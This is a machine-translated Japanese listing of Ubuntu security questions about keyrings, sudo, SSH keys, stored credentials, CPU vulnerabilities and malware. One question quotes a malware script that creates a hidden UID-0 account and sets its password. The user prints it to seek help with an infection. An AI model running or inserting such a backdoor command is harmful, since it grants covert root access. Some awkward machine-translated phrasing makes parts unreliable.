タグ付けされた質問 「security」

defaultとloginの違いは何ですか？ そして、何をんデフォルトキーリングはどういう意味ですか？ 一部のアプリケーション（Emphatyなど）を実行すると、最初にロック解除キーリングウィンドウが起動し、次にパスワードが必要になります。どうして？ これは、Emphatyを実行したときのスクリーンショットです。 なぜパスワードが必要なのですか？それはただのメッセンジャーです。私は夢中になります。 このウィンドウを見つけることができました。このWindowsで解決できると思います。 修正する前に、それらが何であるかを知りたいです。 それらを私に説明してください。 PS私のログインパスワードは現在デフォルトのパスワードと等しくありません。

13 security  password  gnome-keyring 

Software Center、Update Manager、および他のいくつかのシステム管理アプリケーションは、パスワードを要求せずに動作します（NOPASSWDで構成されている場合はsudoのように）、代わりに確認を要求するだけで、または確認なしでも動作します。同時に、ユーザーパスワードをまったく使用したくありません。これは到達可能ですか？

13 security  sudo  password  xubuntu  policykit 

私のサーバーの1つにsshアクセスを許可するのに十分信頼できる友人がいます。そのために、彼のユーザーアカウントを作成しました。 このボックスには、パスワードではなくキー認証によってのみアクセスできます。そのアカウントの秘密キーを作成しましたが、電子メールで彼に送信すると、強力な（er）セキュリティのポイントを失います パスワード認証に頼ることなく、このアカウントへのアクセスを許可する最良の方法は何ですか？ その他の困難：彼はWindowsボックスを使用していますが、PuTTYをインストールするのに十分簡単です

13 security  ssh 

Update Managerは、セキュリティ更新プログラムをバックグラウンドでサイレントにダウンロードおよびリリースするように設定されています。したがって、リリースノートは表示されなくなりました。後でリリースノートを読む方法があるのだろうか。どのアップデートが最近インストールされ、どのバグが修正されているかをどのようにして見つけることができますか？

13 updates  update-manager  security 

ユーザー名とパスワードを使用してサービスで自動的に認証するBashスクリプトがあります。資格情報は現在、スクリプト内にプレーンテキストとして保存されています。 スクリプトへのアクセスを許可しながら、これらの資格情報を最も安全に保存するには、どのような予防策を講じる必要がありますか？ 明確化のポイント： 可能であれば、代わりに他の認証方法を使用する必要があることを理解しています。パスワード認証が唯一のオプションである場合の対処方法を引き続き知りたい。 パスワードをまったく保存しないことは、ここでは受け入れられない答えです。スクリプトにパスワードへの無人アクセスが必要な場合について質問しています。

13 security  password  scripts  automation  authentication 

のルートアカウントの現在のデフォルト/etc/passwdはroot:x:0:0:root:/root:/bin/bashです。 に設定してみませんroot:x:0:0:root:/root:/usr/sbin/nologinか？

12 command-line  security  root 

MeltdownおよびSpectreの脆弱性は、暗号化されたホームディレクトリとVPNサービスの使用を伴うコンピューターにも影響を及ぼしますか？つまり、暗号化された送信とVPNサービスが実装されている場合、ハッカーはパスワードを盗むことができますか？

12 security  vpn 

インテルは最近、ウェブサイトに深刻なセキュリティ脆弱性を公開しました。多くのプロセッサフ​​ァミリが影響を受けます。それらのツールを使用して、私のラップトップが影響を受けると識別されました。Ubuntuでこのような問題を軽減する方法はありますか？ 前もって感謝します

12 security  intel 

そのため、sudoを使用して管理者権限を取得するという提案があったときに、ワインに何かをインストールしようとしていました。それは私が上記のメッセージを受け取ったときです ~/.wine is not owned by you 読んでみると、なぜこのメッセージが表示されるのか、そしてsudoワインを飲もうとするのは本当に悪い考えだということにすぐに気付きました。 だから私はこれ以上何もせず、sudo二度とワインを飲むつもりはありません。私の質問は、このブロックを受け取ったので、安全ですか？または、ワインをすべて削除する必要がありますか？

12 wine  sudo  security  malware 

起動可能なUbuntu USBドライブでは、コンピューターのハードドライブに何かを書き込むことができないのは本当ですか？ もしそうなら、SSDドライブを搭載したコンピューターは私のもののように、ブート可能なUSBセッションの痕跡を残しませんか？

12 boot  usb  hard-drive  security  drive 

Linuxターミナルのセキュリティ上の大きな問題になるのではないかと思いました。g ++ 5.0をインストールしようとしていました。私はLinuxの初心者なので、を入力しましたsudo apt-get install g++ 5.0。エラーや何かを返す代わりに、Virtual Boxをインストールしました！ ターミナルから1つのものをインストールしようとして、まったく異なるものをインストールしようとすると、それは別の何か、おそらくマルウェアに起こる可能性があるということですか？とにかくまったく違うものを入力したときにVirtual Boxがインストールされるのはなぜですか？

12 command-line  apt  software-installation  virtualbox  security 

Ubuntuコンピューターにパスワードがありますが、ログインの横の矢印をクリックするだけで、アカウントにアクセスできます。私はこれを無効にしたいのです、なぜなら私の兄弟たちは先に進んでおり、私は彼らにそれを望まないからです。また、ゲストセッションの一部を無効にしたいのですが、方法もわかりません。助けてください？

12 security 

Ubuntu 13.10ラップトップが何らかのマルウェアに感染していることはかなり確信しています。 時々、プロセス/ lib / sshd（rootが所有）が実行され、CPUを大量に消費しているのを見つけます。/ usr / sbin / sshdを実行するのはsshdサーバーではありません。 バイナリには--wxrw-rwt権限があり、/ libディレクトリにスクリプトを生成および生成します。最近のものは13959730401387633604という名前で、次のことを行います #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusrユーザーはマルウェアによって独自に作成された後、100％のCPUを消費しながらchpasswdがハングします。 これまでのところ、/ etc /のファイルにgusrユーザーが追加されたことを確認しました。 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid マルウェアは、これらすべてのファイルのコピーに「-」という接尾辞を付けたようです。ルートによって変更された/ etc /ファイルの完全なリストは、ここから入手できます。 さらに、/ etc / hostsファイルがthisに変更されました。 / lib / sshdは、/ …

12 security  malware 

更新プログラムがセキュリティ更新プログラムであるかどうかを確認する方法は明らかにあります。「N個のセキュリティ更新プログラムがあります」というmotdによく迎えられます。 私がやりたいのは、セキュリティ上の理由でどのパッケージを更新する必要があるかを示すリストをサーバーからメールで受け取ることです。 さらに一歩進んで、電子メールはUbuntuからの該当するセキュリティ通知にリンクします。 基本的に、各サーバーはやや一意です。セキュリティメーリングリストで、一部またはすべてのサーバーにインストールしていないパッケージのメールをいくつか受け取りました。そこで、個々のサーバーに必要なものを教えてほしい。そうすれば、ユーザーにダウンタイムをもたらすApacheのようなサービスの再起動を回避しながら、タイムリーに更新を適用できます。 どうすればこれができますか？

12 server  apt  updates  security  email 

KeePassXサイトには、ダウンロードできるのはLinuxバージョン0.4.3のみです。 Ubuntuに最新バージョンをインストールするにはどうすればよいですか？ 問題は、バージョン0.4が基本的にメンテナンスされていないことです。 参照：https : //www.keepassx.org/dev/issues/78#change-186

12 security  tools  keepass